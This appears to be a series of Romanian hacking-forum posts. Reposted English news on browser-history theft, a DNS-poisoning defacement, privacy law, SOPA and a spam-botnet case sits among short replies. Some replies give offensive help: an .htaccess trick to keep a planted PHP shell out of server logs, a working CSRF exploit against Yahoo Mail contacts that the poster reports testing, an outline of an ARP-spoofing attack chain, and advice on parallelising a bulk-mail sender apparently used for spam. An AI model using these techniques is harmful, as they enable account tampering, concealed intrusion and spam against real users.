Pugna

Touche

A Google researcher has resurrected an attack that allows website operators to steal the browsing history of visitors almost a year after all major browser makers introduced changes to close the gaping privacy hole. Proof-of-concept code recently posted by Google security researcher Michal Zalewski works against the majority of people using the Internet Explorer, Chrome, and Firefox browsers. In an informal test carried out by The Register, the attack was able to list recently visited sites on computers running both Microsoft Windows and Apple OS X. It worked even though all three browser makers have patched their wares to stop them from divulging the addressesof sites visited over the past month or so. “My proof of concept is fairly crude, and will fail for a minority of readers,” Zalewski wrote. “But in my testing, it offers reliable, high-performance, non-destructive cache inspection that blurs the boundary between :visited and all the 'less interesting' techniques.” Previous exploits usually exploited a mechanism built into all browsers that causes recently visited websites to appear differently than non-visited sites. Attacks based on the CSS, or cascading style sheet, definitions weren't merely theoretical. Last year, academic researchers caught YouPorn.com and 45 other sites pilfering visitors' surfing habits by targeting the browser vulnerability, which first came to light more than a decade earlier Zalewski said browser makers closed the hole by “severely crippling” CSS functions built around the :visited selectors. His proof-of-concept, according to comments accompanying the sourcecode (link may not work in all browsers), takes a different approach known as cache timing. It starts by loading an iframe tag containing a list of website into the page accessed by the visitor. It then calculates how quickly the websites are rendered. Those that load more quickly must be stored on the browser cache, an indication they have been visited recently. Cache timing has long been identified as a way to extract browsing history, as noted in awell-known paper (PDF) penned by Princeton University computer scientist Ed Felten. Up to now, the problem with the approach has been that the attacks were slow and easy to detect, making them impractical. Zalewski said his method was able to overcome these disadvantages by allowing browsers to abort the underlying request quickly. As a result, it's able to test about 50 websites per second with no visible signs that anything is amiss. With minor tweaks – including optimizations, parallelism, and possibly a delay calibration, the code could be capable of detecting “several hundred” URLs. Sursa: theregister.

By making use of a technique called DNS poisoning, a cyberattacker managed to take down the websites of Samsung, Google, Gmail, YouTube, Yahoo, Apple, Linux, Microsoft and Hotmail hosted on the .cd domain extension which belongs to the Democratic Republic of Congo. The hacker who calls himself AlpHaNiX managed to deface all the locations by inserting fake records into the cache of DNS servers, reports Security Web-Center. By doing this, the attacker can make sure that he can alter the responses to a DNS query, forcing the Internet users to a fake website instead of a real one. Even though DNS cache poisoning is a method favored by many hackers thanks to its efficiency, it's not easy to execute, in most cases the Domain Name System servers being provided by Internet service providers (ISPs) and organizations. Judging by the messages left on the defaced websites, the hacker didn’t have anything “personal” with them, he just wanted to show his powers. Also, since the sites proudly display a Tunisian flag along with the message “Tunisia Rullz,” we can only assume that the hacker originates from Tunisia. At the time of writing, Gmail.cd, Google.cd, Linux.cd, Samsung.cd, Hotmail.cd and Apple.cd are still defaced, while Youtube.cd was taken down altogether. When trying to access Microsoft or Yahoo!, I am automatically redirected to .com domains, which means that steps are already taken to resolve the issue. A few days ago we witnessed how websites belonging to NOD32 and Kaspersky were breached and defaced by hackers. At the time it turned out that Kaspersky’s site wasn’t actually legitimate, instead it was being set up by typosquatters who relied on the misspelled names of a site to lure users to their malicious locations. Sursa: softpedia.

Nu mai da din aripioare ca a castigt, daca erai in locul lui nu mai spuneai nimic.

Imi place, frumos.

Since the current Convention for the Protection of Individuals that addresses the matter of personal data protection and processing is dated from 1981, when the Internet was nowhere near what it has become today, the Council of Europe proposed a revised version. The existing convention is employed by 43 countries and others have already expressed their interest in it, but since it’s not in line with the current problems faced by organizations, they plan on keeping the current framework, but modify it to make sure it’s more relevant. “I think that certainly the fact that you have more and more privacy issues on the news, it's raised first general public opinion on those issues, but indeed also the fact that we know that we have a protective framework which is there, but maybe we need to make sure that those cases are not repeated,” Sophie Kwasny, secretary to the Consultative Committee of the Council of Europe data protection convention, said for VR-Zone. “All those cases have definitely raised awareness ... of the fact that some of the legislations in place did not sufficiently cover some of the new threats to privacy.” The main purpose of the update will be to strengthen the rights of individuals and, if so far there has been no clear distinction between data controllers and processors, from now on there will be one. Privacy by design is a term that will have to be regarded seriously by all the businesses that handle and process personal data. If some organizations are already aware of this and are taking steps in implementing the principle, others will be forced to do so after the new law kicks in. To make sure they won’t feel like they’re losing national sovereignty, the 50 or so countries that will sign the upcoming agreement will have the chance to enforce the new regulations in their own way.

Vreau sa te ajut, dar nu vreau sa ma chinui sa inteleg ce vrei sa faci. Fii mai explicit si o sa-ti ofer solutia.

Russian security vendor Kaspersky Lab is to pull out of the Business Software Alliance (BSA) because of the anti-copyright infringement body's support for the controversial US Stop Online Piracy Act (SOPA). Kaspersky Lab founder and chief executive Eugene Kaspersky confirmed via Twitter a story published in Russian newspaper Izvestia last week saying that the country's largest technology firm will withdraw its support for the lobby group from 1 January. "Yes, we're leaving BSA because of their support for #SOPA. I'll come out with a blog post re this issue," he tweeted on Monday. "#SOPA is the vinyl-era legislation trying to manage the industry that requires a different approach," he added in a further update. The BSA numbers most of the largest technology companies in the world among its members, and produces an annual report detailing what it claims to be the growing cost to these firms of software piracy. However, the BSA has itself raised objections to the hugely controversial SOPA legislation, which threatens to polarise opinion in the US as the Digital Economy Act did in the UK last year. The BSA initially commended the US government for drawing up plans to combat software piracy and copyright-infringing web sites, but said last month that the plans need more balance and should contain clearer legal definitions regarding the kinds of site SOPA will target. "Valid and important questions have been raised about the bill. It is intended to get at the worst of the worst offenders. As it now stands, however, it could sweep in more than just truly egregious actors," warned BSA president and chief executive Robert Holleyman in a statement at the time. "Due process, free speech and privacy are rights which cannot be compromised. And the security of networks and communications is indispensable to a thriving internet economy." However, despite the BSA's modified stance on the proposed legislation, Kaspersky Lab seems set on leaving and will release a more formal statement on the matter soon. Sursa : V3.

A mai fost postat : http://rstcenter.com/forum/44226-intercepter-ng-new-sniffing-tool.rst

Puteai sa faci bani frumosi. Nu va mai grabiti

In regula, ai generat MAC-ul, dar unde il schimbi ?

fsockopen() pe udp face treaba mult mai buna.

E ca si cand ai un copil si ne ceri parere ce nume sa-i pui. E proiectul tau, tu stii cel mai bine. Gandeste-te la un nume care sa contina "IT", "Online", "News", "HOWTO". Nu vreau sa te descurajez, dar sunt deja cu miile pe net. O sa iti piara avantul in maxim 2 saptamani, dar experienta conteaza.

Incearca sa il bootezi in safe mode ori cu last known good configuration. Alta posibilitate nu vad.

Un mic trick in .htaccess ca sa dezactivati logging-ul pentru un anume fisier pe care-l accesati (ex: shell php). SetEnvIf Request_URI "^/dir/file\.php$" dontlog <Limit GET POST HEAD> order deny,allow deny from all allow from 127.0.0.1 (or the remote ip of the server). </Limit>

N-am idee, eu doar ti-am propus o solutie la indemana, ca oricum fara drepturi de administrator nu iti face schimbarile. Mie-mi functioneaza perfect.

Referitor la TOR : Why Tor Has Failed But I2P Will Not. E un punct de vedere. Mai cititi despre I2P.

Recently leaked online chat records may provide the closest look yet at a Russian man awaiting trial in Wisconsin on charges of running a cybercrime machine once responsible for sending between 30 to 40 percent of the world’s junk email. Oleg Nikolaenko Oleg Y. Nikolaenko, a 24-year-old who’s been dubbed “The King of Spam,” was arrested by authorities in November 2010 as he visited a car show in Las Vegas. The U.S. Justice Department alleges that Nikolaenko, using the online nickname “Docent” earned hundreds of thousands of dollars using his “Mega-D” botnet, which authorities say infected more than half a million PCs and could send over 10 billion spam messages a day. Nikoalenko has pleaded not guilty to the charges, and is slated to appear in court this week for a status conference (PDF) on his case. The Justice Department alleges that Nikolaenko spammed on behalf of Lance Atkinson and other members of Affking, an affiliate program that marketed fly-by-night online pharmacies and knockoff designer goods. Atkinson told prosecutors that one of his two largest Russian spamming affiliates used the online moniker Docent. He also said that Docent received payment via an ePassporte account under the name “Genbucks_dcent.” FBI agents later learned that the account was registered in Nikolaenko’s name and address in Russia, and that the email address attached to the account was 4docent@gmail.com. According to my research, Docent also spammed for other rogue pharmacy programs. In fact, it’s hard to find one that didn’t pay him to send spam. In my Pharma Wars series, I’ve detailed how Russian cybercrime investigators probing the operations of the massive GlavMed/SpamIt rogue pharmacy operation seized thousands of chat logs from one of its principal organizers. The chats were later leaked online and to select journalists. Within those records are hundreds of hours of chats between the owners of the pharmacy program and many of the world’s biggest spammers, including dozens with one of its top earners — Docent. According to the SpamIt records, Docent earned commissions totaling more than $325,000 promoting SpamIt pharmacy sites through spam between 2007 and 2010. The Docent in the SpamIt database also had his earnings sent to the same ePassporte account identified by the FBI. The Docent in the leaked chats never references himself as Nikolaevich, but in several cases he asks SpamIt coordinators to send documents to him at the 4docent@gmail.com address. The chats between Docent and Stupin show a young man who is ultra-confident in the value and sheer spam-blasting power of his botnet. Below are the first in a series of conversation snippets between Docent and SpamIt co-administrator Dmitry Stupin. Before each is a brief note providing some context. In the transcript that follows, Stupin tries to woo Docent to join SpamIt. Docent negotiates a much higher commission rate than is usually given to new spamming partners. The typical rate is 30 percent of each sale, but Docent is a known figure in the spamming underground, and argues that his botnet will bring such massive traffic to the SpamIt pharmacies that he deserves a higher 45 or 50 percent cut of the sales. This conversation was recorded on Feb. 1, 2007. == Approximately one week later….. === == Two days later, Docent is signed up with SpamIt, but has not yet started spamming for the affiliate program directly. In this chat, however, he obtains referral codes on behalf of two other spammers who want to join SpamIt; all of the affiliates he brings in will pay a portion of their commissions to Docent as a referral fee. === In the conversation below, recorded Nov. 23, 2007, Docent and Stupin discuss earnings of two SpamIt affiliates referred to the program by Docent. One of them, who uses the nickname “Cosma,” eventually becomes one of SpamIt’s all-time top earners. According to Microsoft, Cosma was the individual behind the Rustock spam botnet. The other referred affiliate is an American spammer who used the nicknames “Speedy” and “Lightspeed.” Sursa: krebs.

# Vulnerability found in- Yahoomail Delete Contact module # email prakhar.agrawal26@gmail.com # company AKS IT Services Pvt. Ltd # Credit by Prakar Agrawal # Email Service Yahoomail # Category Mail service # Site p4ge http://www.yahoomail.com # Plateform java # Proof of concept # Targeted URL: http://address.mail.yahoo.com/ Script to Delete the contacts from contact list through Cross Site request forgery . ................................................................................................................ <html> <body> <form name="csrf" action="http://us.mg5.mail.yahoo.com/yab-fe/mu/DeleteContact.json?" method="POST"> <input type=hidden name="action" value="delete_contacts"> <input type=hidden name="id" value="$Numeric No.$"> </form> <script>document.csrf.submit();</script> </body> </html> . .................................................................................................................. Put any Numeric No. (i.e 1,2,3,4 etc) in id field parameter and try to forge the functionality. its working..... ________________________________________________________________________ L-am testat, functioneaza. Am incercat acelasi lucru si pentru editare, cu modificarile de rigoare: <html> <body> <form name="csrf" action="http://us.mg5.mail.yahoo.com/yab-fe/mu/EditContact.json?" method="POST"> <input type=hidden name="action" value="edit_contact"> <input type=hidden name="contact_id" value="16777820"> <input type=hidden name="fields[0:1::16778515:1]" value="^[eOo]^[PrInCeSs]^"> <input type=hidden name="fields[0:3::16778515:1]" value="DeeAYYY"> <input type=hidden name="flags[8:::16778516:1]" value="8:::0:0"> <input type=hidden name="fields[8:::16778516:1]" value="sw33t_babygirl_007"> <input type=hidden name="flags[7::3:0:1]" value="7::3:0:0"> <input type=hidden name="flags[7::0:0:1]" value="7::0:0:0"> <input type=hidden name="flags[17:::0:1]" value="17:::0:0"> <input type=hidden name="flags[18:::0:1]" value="18:::0:0"> </form> <script>document.csrf.submit();</script> </body> </html> Dar primesc un 500 Internal in headere. Ciudat e ca merge delete-ul. Care mai e utilitatea tokenului _crumb daca avem CSRF ?

Da, simplu, acum fiecare ii gaseste utilitatea. O data conectat la router aflu parola de la wlan, ma conectez la wireless ( daca vorbim de acelasi subnet banuiesc ca mi-e vecin ), fac un arpspoof, ii arunc in browser un payload si iau acces. Delicat si frumos.

Te hazardezi degeaba. Installer-ul e de pe site-ul lor oficial, iar Technium au istorie. Il detecteaza din cauza functiilor pe care le are. False positive : http://forums.cnet.com/7723-21574_102-546820.html

N-am idee, eu cand am avut nevoie mi le-am scris singur, iar vremea a trecut si n-am cum sa le mai gasesc ca sa pot impartasi cu voi.

Poti sa-l faci mai rapid. Am observat implementari "multithread" prin bash. multi.bash: nohup send.php $1 $2 & Prin multi.bash ii dai lui send.php ca argumente doua limite care reprezinta doua capete de linii dintr-un fisier care contine mailurile. multi.bash 0 10=> nohup send.php 0 10 & Adica send.php preia toate mailurile intre liniile 0 - 10 inclusiv si le expediaza. Daca mai faci un bash cu un for care sa ruleze multi.bash de fiecare data cand cresti argumentele, ai "multithread". In procese o sa gasesti : ./multi.bash 0 10 ./multi.bash 11 20 ./multi.bash 21 30 ./multi.bash 31 40 ... Daca ii gasesti utilitate, contacteaza-ma prin email daca vrei sa te ajut.

Port COM ? Pentru POS-uri banuiesc. Nu, nu sniffeaza

Destul de ... brut Tot ce mi-a placut din ce-ai scris e: cat $1 |sort |uniq >list.txt Restul e doar o implementare a nevoii.